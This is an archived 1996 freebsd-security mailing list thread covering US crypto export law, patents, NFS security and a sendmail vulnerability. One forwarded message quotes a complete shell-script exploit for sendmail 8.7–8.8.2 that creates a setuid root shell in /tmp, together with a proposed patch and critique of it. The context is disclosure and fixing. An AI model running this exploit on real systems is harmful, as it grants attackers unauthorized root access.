freefall.freebsd.org (8.7.5/8.7.3) id BAA27020 for security-outgoing; Thu, 14 Nov 1996 01:45:55 -0800 (PST) Received: from verdi.nethelp.no (verdi.nethelp.no [193.91.212.2]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id BAA27012 for ; Thu, 14 Nov 1996 01:45:37 -0800 (PST) From: sthaug@nethelp.no Received: (qmail 26413 invoked by uid 1001); 14 Nov 1996 09:44:03 +0000 (GMT) To: assar@sics.se Cc: danny@panda.hilink.com.au, wpaul@skynet.ctr.columbia.edu, Guido.vanRooij@nl.cis.philips.com, freebsd-security@freebsd.org Subject: Re: Secure RPC revisited In-Reply-To: Your message of "14 Nov 1996 09:29:01 +0100" References: <5l7mnpaxma.fsf@assaris.sics.se> X-Mailer: Mew version 1.05+ on Emacs 19.28.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Thu, 14 Nov 1996 10:44:03 +0100 Message-ID: <26411.847964643@verdi.nethelp.no> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > THe algorithms are export controlled. PKP is probably not allowed to > > export the algorithm for the purposes of obtaining a patent! > > Isn't it only the implementation of the algorithms as computer > programs that's export controlled? Yes. Bruce Schneier's book "Applied Cryptography" contains source code for a lot of different crypto algorithms. The book can be (and indeed is) freely exported from the US. The *diskette* containing the source code can *not* be exported (at least not so far - the case is continuing. See http://www.qualcomm.com/people/pkarn/export/index.html.) Steinar Haug, Nethelp consulting, sthaug@nethelp.no From owner-freebsd-security Thu Nov 14 08:07:13 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA01182 for security-outgoing; Thu, 14 Nov 1996 08:07:13 -0800 (PST) Received: from skynet.ctr.columbia.edu (skynet.ctr.columbia.edu [128.59.64.70]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA01077 for ; Thu, 14 Nov 1996 08:06:48 -0800 (PST) Received: (from wpaul@localhost) by skynet.ctr.columbia.edu (8.6.12/8.6.9) id LAA27259; Thu, 14 Nov 1996 11:06:13 -0500 From: Bill Paul Message-Id: <199611141606.LAA27259@skynet.ctr.columbia.edu> Subject: Re: Secure RPC revisited To: kallio@cc.jyu.fi (Seppo Kallio) Date: Thu, 14 Nov 1996 11:06:12 -0500 (EST) Cc: freebsd-security@freebsd.org In-Reply-To: from "Seppo Kallio" at Nov 14, 96 08:13:53 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Of all the gin joints in all the towns in all the world, Seppo Kallio had to walk into mine and say: > > Linux has also DES in passwd system. They do not have any question about > US/NonUS in install as FreeBSD has. How have they solved this? If They > have solved it somehow, why can't FreeBSD solve the problem same way? > > Seppo I don't think the Linux people 'solved' this in any way. I think they just went ahead and included the code and either weren't aware of the export laws, or they were aware of them and just hoped that nobody would notice what they were doing. -Bill -- ============================================================================= -Bill Paul (212) 854-6020 | System Manager, Master of Unix-Fu Work: wpaul@ctr.columbia.edu | Center for Telecommunications Research Home: wpaul@skynet.ctr.columbia.edu | Columbia University, New York City ============================================================================= "If you're ever in trouble, go to the CTR. Ask for Bill. He will help you." ============================================================================= From owner-freebsd-security Thu Nov 14 09:18:28 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA19025 for security-outgoing; Thu, 14 Nov 1996 09:18:28 -0800 (PST) Received: from hauki.clinet.fi (root@hauki.clinet.fi [194.100.0.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA18992 for ; Thu, 14 Nov 1996 09:17:50 -0800 (PST) Received: from [194.100.45.1] (mac.metis.clinet.fi [194.100.45.1]) by hauki.clinet.fi (8.7.6/8.6.4) with SMTP id TAA10670 for ; Thu, 14 Nov 1996 19:17:17 +0200 (EET) X-Sender: pera@pop.hut.fi. Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 14 Nov 1996 19:21:50 +0200 To: freebsd-security@freebsd.org From: petri.riihikallio@hut.fi (Petri Riihikallio) Subject: Re: Secure RPC revisited Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >I thought SSH also used diffie hellman. It seems they don't have a problem. >Exactly *where* is the patent living? If it is only in the states, we >might just install it on the internat repository? RSA claims that their Diffie-Hellman patent covers all public key algorithms. Their patent is valid only in the U.S. and Canada, since the algorithm was published before anyone understood its commercial value. You cannot patent published inventions in Europe. SSH was developed in Finland. The free Unix version was made available by FTP. DataFellows is the Finnish company trying to commercialice SSH. They have bought a licence from PKP/RSA/RSADSI to distribute commercial versions of SSH in the U.S. and Canada. There are encryption algorithms with valid patents on both sides of the Atlantic. IDEA is one. A licence for commercial use of IDEA is expensive, and that is the reason there are so few commercial products supporting PGP. The only one I know of is ViaCrypt, and they had already bought an unlimited licence before anyone had heard of PGP. To get back to the topic. It is forbidden by the U.S. export laws to export any product with hooks for a drop-in encryption engine. That is why MS Crypto API and Apple's PowerTalk security API are not fully documented. Nobody ever tried to find out whether INT13 of MS-DOS was such a hook. There are encrypted filesystem implementations available based on it. It appears to be difficult to fully obey the U.S. law when exporting any computer product. If you ask any official opinion it is probably negative just to be on the safe side. The opposite is to try your luck. With a free product that is not reasonable. The law is at fault, but it is the most constant part of this equation. The safe way to do it is to make a public version without any dummy encryption hooks. Then create a patch which adds the hooks and then the additional library. The patch and the library should live outside the U.S. Yes. It is troublesome and many potential users won't do it. But that is the exact intention of the law. Petri -- Petri.Riihikallio@hut.fi From owner-freebsd-security Thu Nov 14 09:47:03 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA21187 for security-outgoing; Thu, 14 Nov 1996 09:47:03 -0800 (PST) Received: from gatekeeper.fsl.noaa.gov (gatekeeper.fsl.noaa.gov [137.75.131.181]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA21164 for ; Thu, 14 Nov 1996 09:46:44 -0800 (PST) Received: from cardinal.fsl.noaa.gov (daemon@cardinal.fsl.noaa.gov [137.75.60.101]) by gatekeeper.fsl.noaa.gov (8.7.5/8.7.3) with ESMTP id RAA10632; Thu, 14 Nov 1996 17:46:39 GMT Received: from auk.fsl.noaa.gov by cardinal.fsl.noaa.gov with SMTP (1.40.112.3/16.2) id AA203883598; Thu, 14 Nov 1996 17:46:39 GMT Message-Id: <328B5B03.7185@fsl.noaa.gov> Date: Thu, 14 Nov 1996 10:46:43 -0700 From: Sean Kelly Organization: NOAA Forecast Systems Laboratory X-Mailer: Mozilla 3.0Gold (X11; I; HP-UX B.10.10 9000/725) Mime-Version: 1.0 To: Bill Paul Cc: Seppo Kallio , freebsd-security@freebsd.org Subject: Re: Secure RPC revisited References: <199611141606.LAA27259@skynet.ctr.columbia.edu> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Bill Paul wrote: > I don't think the Linux people 'solved' this in any way. I think > they just went ahead and included the code and either weren't aware > of the export laws, or they were aware of them and just hoped that > nobody would notice what they were doing. Being surrounded by Linux bigots most of the day, information like this makes it very tempting to hinder the entire Linux effort by placing a few yet highly effective phone calls. The idea's quite sleazy, though, so I won't be doing it. -- Sean Kelly NOAA Forecast Systems Laboratory kelly@fsl.noaa.gov Boulder Colorado USA http://www-sdd.fsl.noaa.gov/~kelly/ From owner-freebsd-security Thu Nov 14 20:59:39 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA13119 for security-outgoing; Thu, 14 Nov 1996 20:59:39 -0800 (PST) Received: from ingenieria ([168.176.15.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id UAA13028 for ; Thu, 14 Nov 1996 20:59:24 -0800 (PST) Received: from unalmodem.usc.unal.edu.co by ingenieria (SMI-8.6/SMI-SVR4) id XAA12284; Thu, 14 Nov 1996 23:59:18 +0600 Message-ID: <328C221D.44A4@ingenieria.ingsala.unal.edu.co> Date: Thu, 14 Nov 1996 23:56:13 -0800 From: "Pedro Giffuni S." Reply-To: pgiffuni@fps.biblos.unal.edu.co Organization: Universidad Nacional de Colombia X-Mailer: Mozilla 3.0 (Win16; I) MIME-Version: 1.0 To: freebsd-security@FreeBSD.org Subject: Re: Secure RPC revisited References: Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Petri Riihikallio wrote: > > It appears to be difficult to fully obey the U.S. law when exporting any > computer product. If you ask any official opinion it is probably negative just > to be on the safe side. The opposite is to try your luck. With a free product > that is not reasonable. The law is at fault, but it is the most constant part > of this equation. > Well, there´s another solution, you can telnet to Canada, or another part of the free world, and write your encryption there. Technically speaking you are not exporting the software, but then Walnut Creek, Netscape, IBM and the others should follow OpenBSD and move their headquarters to Canada. Is it posible to have a Blue Ribbon Campaign part II, to liberate free software from "US military masterminds"? I´m sure many US companies are having the same problem with their software and would support such a campaign. Pedro. > -- > Petri.Riihikallio@hut.fi From owner-freebsd-security Thu Nov 14 23:37:26 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA22421 for security-outgoing; Thu, 14 Nov 1996 23:37:26 -0800 (PST) Received: from bitbucket.edmweb.com (bitbucket.edmweb.com [204.244.190.9]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id XAA22416 for ; Thu, 14 Nov 1996 23:37:23 -0800 (PST) Received: (from steve@localhost) by bitbucket.edmweb.com (8.6.12/8.6.12) id XAA00828; Thu, 14 Nov 1996 23:36:31 -0800 Date: Thu, 14 Nov 1996 23:36:25 -0800 (PST) From: Steve Reid To: pgiffuni@fps.biblos.unal.edu.co cc: freebsd-security@freebsd.org Subject: Re: Secure RPC revisited In-Reply-To: <328C221D.44A4@ingenieria.ingsala.unal.edu.co> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Well, there=B4s another solution, you can telnet to Canada, or another > part of the free world, and write your encryption there. Technically > speaking you are not exporting the software,=20 Technically you _are_ exporting it over the telnet connection. Of course, if you use Ssh instead of telnet nobody will know. :) I am not a lawyer but it seems to me that ITAR applies to whatever the anti-crypto powers want it to apply to. The "crypto hooks" part is so broad that it could potentially allow a piece of wire to be considered a munition since you could plug crypto into it (same as plugging it into crypto). The anti-crypto forces are somewhat limited in what they _do_ prosecute, because if they prosecute something stupid the law could be thrown out on constitutional grounds.=20 > but then Walnut Creek, Netscape, IBM and the others should follow > OpenBSD and move their headquarters to Canada.=20 I may be mistaken, but I think taxes are quite a bit higher up here.=20 The US crypto export matter is currently before the courts. Hopefully the courts will decide that crypto-related parts of ITAR are unconstitutional. There's also the "Pro-CODE" bill trying to get through Congress, but I guess the courts will probably be where it's won, just like with the CDA.= =20 > Is it posible to have a Blue Ribbon Campaign part II, to liberate free > software from "US military masterminds"? I=B4m sure many US companies are > having the same problem with their software and would support such a > campaign. There's the Golden Key Campaign. See http://www.privacy.org/ipc/=20 From owner-freebsd-security Fri Nov 15 01:18:34 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA29045 for security-outgoing; Fri, 15 Nov 1996 01:18:34 -0800 (PST) Received: from relay.nuxi.com (nuxi.cs.ucdavis.edu [128.120.56.38]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA29038 for ; Fri, 15 Nov 1996 01:18:21 -0800 (PST) Received: (from obrien@localhost) by relay.nuxi.com (8.7.5/8.6.12) id BAA04190; Fri, 15 Nov 1996 01:18:38 -0800 (PST) Message-Id: <199611150918.BAA04190@relay.nuxi.com> Date: Fri, 15 Nov 1996 01:18:38 -0800 From: obrien@NUXI.com (David E. O'Brien) To: freebsd-security@freebsd.org Subject: Re: Secure RPC revisited References: <5l7mnpaxma.fsf@assaris.sics.se> <26411.847964643@verdi.nethelp.no> X-Mailer: Mutt 0.48.1-PL0 Mime-Version: 1.0 X-PGP-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Keyid: 34F9F9D5 In-Reply-To: <26411.847964643@verdi.nethelp.no>; from sthaug@nethelp.no on Nov 14, 1996 10:44:03 +0100 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk sthaug@nethelp.no writes: > > Yes. Bruce Schneier's book "Applied Cryptography" contains source code > for a lot of different crypto algorithms. The book can be (and indeed > is) freely exported from the US. The *diskette* containing the source > code can *not* be exported It is because of this crap, that Phillip Zimmerman, published a book that is nothing more than code listings of PGP in scanner-friendly OCR font. See, books are protected under the 1st admendment (right to free speach) to the US Consitition. Also, being a book, it is well understood that it can't be censored. -- David (obrien@cs.ucdavis.edu) From owner-freebsd-security Fri Nov 15 07:19:32 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA19807 for security-outgoing; Fri, 15 Nov 1996 07:19:32 -0800 (PST) Received: from pluscom.cronyx.ru (gw.rinet.ru [194.87.171.65]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id HAA19764 for ; Fri, 15 Nov 1996 07:18:28 -0800 (PST) Received: by pluscom.cronyx.ru id SAA07972; (8.6.11/vak/1.9) Fri, 15 Nov 1996 18:16:53 +0300 Date: Fri, 15 Nov 1996 18:16:53 +0300 From: marck@pluscom.cronyx.ru (Dmitry Morozovsky) Message-Id: <199611151516.SAA07972@pluscom.cronyx.ru> To: freebsd-security@freebsd.org Subject: Re: NFS Server, is it secure? Newsgroups: freebsd.security X-Newsreader: TIN [version 1.2 PL2] Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Mark Newton wrote: > Well, yes -- NFS is basically never "secure" on any platform. The > NFS protocol was never designed with security in mind. > If you know (or can guess) the NFS filehandle for an NFS filesystem > root then you can spoof the protocol for a start. > Firewall your NFS server: Its services should not be reachable from > the Internet-at-large. Is NFS server with no exports with write permissions vulnerable too? -- Sincerely, D.Marck ======================================================================== === D.Marck --- Dmitry Morozovsky --- marck@rinet.ru --- Wild Woozle === ======================================================================== From owner-freebsd-security Fri Nov 15 13:11:14 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA16444 for security-outgoing; Fri, 15 Nov 1996 13:11:14 -0800 (PST) Received: from fps.biblos.unal.edu.co ([168.176.37.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id NAA16423; Fri, 15 Nov 1996 13:10:53 -0800 (PST) From: pgiffuni@fps.biblos.unal.edu.co Received: from localhost by fps.biblos.unal.edu.co (AIX 4.1/UCB 5.64/4.03) id AA02902; Fri, 15 Nov 1996 16:17:00 -0500 Date: Fri, 15 Nov 1996 16:16:57 -0500 (EST) To: security@freebsd.org Cc: ports@freebsd.org Subject: Exportable socks5 ! Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk There`s an exportable version of socks5, and they support FreeBSD 2.x ! It`s available at: http://www.socks.nec.com/download.html Pedro. From owner-freebsd-security Fri Nov 15 14:37:16 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA22712 for security-outgoing; Fri, 15 Nov 1996 14:37:16 -0800 (PST) Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA22694; Fri, 15 Nov 1996 14:36:50 -0800 (PST) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id OAA07077; Fri, 15 Nov 1996 14:36:07 -0800 (PST) Received: from crab.whistle.com(207.76.205.112) by whistle.com via smap (V1.3) id sma007073; Fri Nov 15 14:36:05 1996 Received: (from ambrisko@localhost) by crab.whistle.com (8.7.6/8.6.12) id OAA01396; Fri, 15 Nov 1996 14:35:05 -0800 (PST) From: Doug Ambrisko Message-Id: <199611152235.OAA01396@crab.whistle.com> Subject: Re: Exportable socks5 ! In-Reply-To: from "pgiffuni@fps.biblos.unal.edu.co" at "Nov 15, 96 04:16:57 pm" To: pgiffuni@fps.biblos.unal.edu.co Date: Fri, 15 Nov 1996 14:35:05 -0800 (PST) Cc: security@FreeBSD.org, ports@FreeBSD.org X-Mailer: ELM [version 2.4ME+ PL25 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk pgiffuni@fps.biblos.unal.edu.co writes: | There`s an exportable version of socks5, and they support FreeBSD 2.x ! | It`s available at: | http://www.socks.nec.com/download.html In fact it is in the ports collection already, we can't make a package of it due to terms. Thanks to the author, I was able to get him put in that plug for FreeBSD! Doug A. From owner-freebsd-security Fri Nov 15 15:45:44 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA27747 for security-outgoing; Fri, 15 Nov 1996 15:45:44 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id PAA27742 for ; Fri, 15 Nov 1996 15:45:41 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id SAA29894; Fri, 15 Nov 1996 18:42:49 -0500 From: Adam Shostack Message-Id: <199611152342.SAA29894@homeport.org> Subject: Re: NFS Server, is it secure? In-Reply-To: <199611151516.SAA07972@pluscom.cronyx.ru> from Dmitry Morozovsky at "Nov 15, 96 06:16:53 pm" To: marck@pluscom.cronyx.ru (Dmitry Morozovsky) Date: Fri, 15 Nov 1996 18:42:49 -0500 (EST) Cc: freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Dmitry Morozovsky wrote: | Mark Newton wrote: | > Well, yes -- NFS is basically never "secure" on any platform. The | > NFS protocol was never designed with security in mind. | | > If you know (or can guess) the NFS filehandle for an NFS filesystem | > root then you can spoof the protocol for a start. | | > Firewall your NFS server: Its services should not be reachable from | > the Internet-at-large. | | Is NFS server with no exports with write permissions vulnerable too? It depends if you're keeping confidential information on the server. But if you're going to export it read only, might as well put it on the web. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Sat Nov 16 11:27:49 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA14302 for security-outgoing; Sat, 16 Nov 1996 11:27:49 -0800 (PST) Received: from cwsys.cwent.com (cschuber.net.gov.bc.ca [142.31.240.113]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id LAA14295; Sat, 16 Nov 1996 11:27:38 -0800 (PST) Received: from cwsys (1000@localhost [127.0.0.1]) by cwsys.cwent.com (8.8.2/8.6.10) with ESMTP id LAA04262; Sat, 16 Nov 1996 11:27:33 -0800 (PST) Message-Id: <199611161927.LAA04262@cwsys.cwent.com> Reply-to: cschuber@uumail.gov.bc.ca X-Mailer: Xmh To: security-officer@freebsd.org cc: freebsd-security@freebsd.org Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Date: Sat, 16 Nov 1996 11:27:28 -0800 From: Cy Schubert Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This appears to be a better fix, and it works too. Regards, Phone: (604)389-3827 Cy Schubert OV/VM: BCSC02(CSCHUBER) Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET ITSD Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it." ------- Forwarded Message Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.2/8.6.10) with SMTP id IAA23212 for cy; Sat, 16 Nov 1996 08:40:16 -0800 (PST) X-UIDL: 848169128.001 Resent-From: Cy Schubert - ITSD Open Systems Group Resent-Message-Id: <199611161640.IAA23212@passer.osg.gov.bc.ca> Received: from orca.gov.bc.ca (orca.gov.bc.ca [142.32.102.25]) by passer.osg.gov.bc.ca (8.8.2/8.6.10) with SMTP id IAA22021 for ; Sat, 16 Nov 1996 08:40:15 -0800 (PST) Received: from pdx1.world.net by orca.gov.bc.ca (5.4R3.10/200.1.1.4) id AA02926; Sat, 16 Nov 1996 08:40:13 -0800 Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id IAA02623; Sat, 16 Nov 1996 08:38:55 -0800 (PST) Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id DAA30954; Sun, 17 Nov 1996 03:35:59 +1100 Prev-Resent-Date: Sun, 17 Nov 1996 03:35:59 +1100 Old-X-Envelope-From: cjs@portal.ca Sun Nov 17 03:27:52 1996 X-Authentication-Warning: didactic.cynic.net: cjs owned process doing -bs Date: Sat, 16 Nov 1996 00:15:39 -0800 (PST) From: Curt Sampson X-Sender: cjs@didactic To: Leshka Zakharoff Cc: best-of-security@suburbia.net In-Reply-To: <199611160110.EAA04168@leshka.chuvashia.su> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Approved: proff@suburbia.net Prev-Resent-Message-Id: <"2hTZt3.0.dZ7.krUZo"@suburbia> Prev-Resent-From: best-of-security@suburbia.net X-Mailing-List: archive/latest/509 X-Loop: best-of-security@suburbia.net Precedence: list Prev-Resent-Sender: best-of-security-request@suburbia.net Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Resent-To: cy@uumail.gov.bc.ca Resent-Date: Sat, 16 Nov 96 08:40:16 -0800 Resent-XMts: smtp Huh. Yet another gaping hole, can you believe it? This is entirely platform-independent, and has not yet been fixed in 8.2.2. Here's the patch to fix it. This was done on 8.7.6; the line numbers may differ in other versions but the patch is the same. - ------------------------------------------------------ - --- main.c.old Mon Sep 16 12:56:01 1996 +++ main.c Fri Nov 15 23:56:48 1996 @@ -1693,14 +1693,16 @@ sighup() { #ifdef LOG if (LogLevel > 3) syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]); #endif releasesignal(SIGHUP); + (void) setgid(RealGid); + (void) setuid(RealUid); execv(SaveArgv[0], (ARGV_T) SaveArgv); #ifdef LOG if (LogLevel > 0) syslog(LOG_ALERT, "could not exec %s: %m", SaveArgv[0]); #endif exit(EX_OSFILE); } - ------------------------------------------------------ Now who the heck to I send this to to get it back into sendmail? There are no e-mail addresses listed for bug reports in the READ_ME file, or anywhere else for that matter. cjs Curt Sampson cjs@portal.ca Info at http://www.portal.ca/ Internet Portal Services, Inc. Vancouver, BC (604) 257-9400 De gustibus, aut bene aut nihil. On Sat, 16 Nov 1996, Leshka Zakharoff wrote: > Date: Sat, 16 Nov 1996 04:10:16 +0300 (MSK) > From: Leshka Zakharoff > To: best-of-security@suburbia.net > Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). > Resent-Date: Sat, 16 Nov 1996 17:32:01 +1100 > Resent-From: best-of-security@suburbia.net > > #-------------------------------- CUT HERE ------------------------------------- > #/bin/sh > # > # > # Hi ! > # This is exploit for sendmail smtpd bug > # (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms). > # This shell script does a root shell in /tmp directory. > # If you have any problems with it, drop me a letter. > # Have fun ! > # > # > # ---------------------- > # --------------------------------------------- > # ----------------- Dedicated to my beautiful lady ------------------ > # --------------------------------------------- > # ---------------------- > # > # Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su > # > # > # > echo 'main() '>>leshka.c > echo '{ '>>leshka.c > echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c > echo '} '>>leshka.c > # > # > echo 'main() '>>smtpd.c > echo '{ '>>smtpd.c > echo ' setuid(0); setgid(0); '>>smtpd.c > echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c > echo '} '>>smtpd.c > # > # > cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c > ./leshka > kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1` > rm leshka.c leshka smtpd.c /tmp/smtpd > /tmp/sh > #-------------------------------- CUT HERE ------------------------------------- > > ------- End of Forwarded Message From owner-freebsd-security Sat Nov 16 11:47:58 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA15202 for security-outgoing; Sat, 16 Nov 1996 11:47:58 -0800 (PST) Received: from procert.cert.dfn.de (root@procert.cert.dfn.de [134.100.14.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id LAA15194; Sat, 16 Nov 1996 11:47:50 -0800 (PST) Received: from tiger.cert.dfn.de (ley@tiger.cert.dfn.de [134.100.14.11]) by procert.cert.dfn.de (8.8.2/8.8.2) with ESMTP id UAA14556; Sat, 16 Nov 1996 20:49:00 +0100 (MET) From: Wolfgang Ley Received: (from ley@localhost) by tiger.cert.dfn.de (8.8.2/8.8.2) id UAA09254; Sat, 16 Nov 1996 20:48:59 +0100 (MET) Message-Id: <199611161948.UAA09254@tiger.cert.dfn.de> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: cschuber@uumail.gov.bc.ca Date: Sat, 16 Nov 1996 20:48:58 +0100 (MET) Cc: security-officer@FreeBSD.org, freebsd-security@FreeBSD.org In-Reply-To: <199611161927.LAA04262@cwsys.cwent.com> from "Cy Schubert" at Nov 16, 96 11:27:28 am Organization: DFN-CERT (Computer Emergency Response Team, Germany) Content-Type: text Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- Cy Schubert wrote: > > This appears to be a better fix, and it works too. May work... Why do people ignore return values? Especially of such important calls like setgid() and setuid()? *bad* idea... By the way: Eric Allman has produced a much better fix. I expect it to be public available very shortly. Bye, Wolfgang. - -- Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 30, 22527 Hamburg, Germany Email: ley@cert.dfn.de Phone: +49 40 5494-2262 Fax: +49 40 5494-2241 PGP-Key available via finger ley@ftp.cert.dfn.de any key-server or via WWW from http://www.cert.dfn.de/~ley/ ...have a nice day > > > Regards, Phone: (604)389-3827 > Cy Schubert OV/VM: BCSC02(CSCHUBER) > Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET > ITSD Internet: cschuber@uumail.gov.bc.ca > cschuber@bcsc02.gov.bc.ca > > "Quit spooling around, JES do it." > > ------- Forwarded Message > > Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.2/8.6.10) with SMTP id IAA23212 for cy; Sat, 16 Nov 1996 08:40:16 -0800 (PST) > X-UIDL: 848169128.001 > Resent-From: Cy Schubert - ITSD Open Systems Group > Resent-Message-Id: <199611161640.IAA23212@passer.osg.gov.bc.ca> > Received: from orca.gov.bc.ca (orca.gov.bc.ca [142.32.102.25]) by passer.osg.gov.bc.ca (8.8.2/8.6.10) with SMTP id IAA22021 for ; Sat, 16 Nov 1996 08:40:15 -0800 (PST) > Received: from pdx1.world.net by orca.gov.bc.ca (5.4R3.10/200.1.1.4) > id AA02926; Sat, 16 Nov 1996 08:40:13 -0800 > Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id IAA02623; Sat, 16 Nov 1996 08:38:55 -0800 (PST) > Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id DAA30954; Sun, 17 Nov 1996 03:35:59 +1100 > Prev-Resent-Date: Sun, 17 Nov 1996 03:35:59 +1100 > Old-X-Envelope-From: cjs@portal.ca Sun Nov 17 03:27:52 1996 > X-Authentication-Warning: didactic.cynic.net: cjs owned process doing -bs > Date: Sat, 16 Nov 1996 00:15:39 -0800 (PST) > From: Curt Sampson > X-Sender: cjs@didactic > To: Leshka Zakharoff > Cc: best-of-security@suburbia.net > In-Reply-To: <199611160110.EAA04168@leshka.chuvashia.su> > Message-Id: > Mime-Version: 1.0 > Content-Type: TEXT/PLAIN; charset=US-ASCII > Approved: proff@suburbia.net > Prev-Resent-Message-Id: <"2hTZt3.0.dZ7.krUZo"@suburbia> > Prev-Resent-From: best-of-security@suburbia.net > X-Mailing-List: archive/latest/509 > X-Loop: best-of-security@suburbia.net > Precedence: list > Prev-Resent-Sender: best-of-security-request@suburbia.net > Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). > Resent-To: cy@uumail.gov.bc.ca > Resent-Date: Sat, 16 Nov 96 08:40:16 -0800 > Resent-XMts: smtp > > > Huh. Yet another gaping hole, can you believe it? This is entirely > platform-independent, and has not yet been fixed in 8.2.2. Here's > the patch to fix it. This was done on 8.7.6; the line numbers may > differ in other versions but the patch is the same. > > - ------------------------------------------------------ > - --- main.c.old Mon Sep 16 12:56:01 1996 > +++ main.c Fri Nov 15 23:56:48 1996 > @@ -1693,14 +1693,16 @@ > sighup() > { > #ifdef LOG > if (LogLevel > 3) > syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]); > #endif > releasesignal(SIGHUP); > + (void) setgid(RealGid); > + (void) setuid(RealUid); > execv(SaveArgv[0], (ARGV_T) SaveArgv); > #ifdef LOG > if (LogLevel > 0) > syslog(LOG_ALERT, "could not exec %s: %m", SaveArgv[0]); > #endif > exit(EX_OSFILE); > } > - 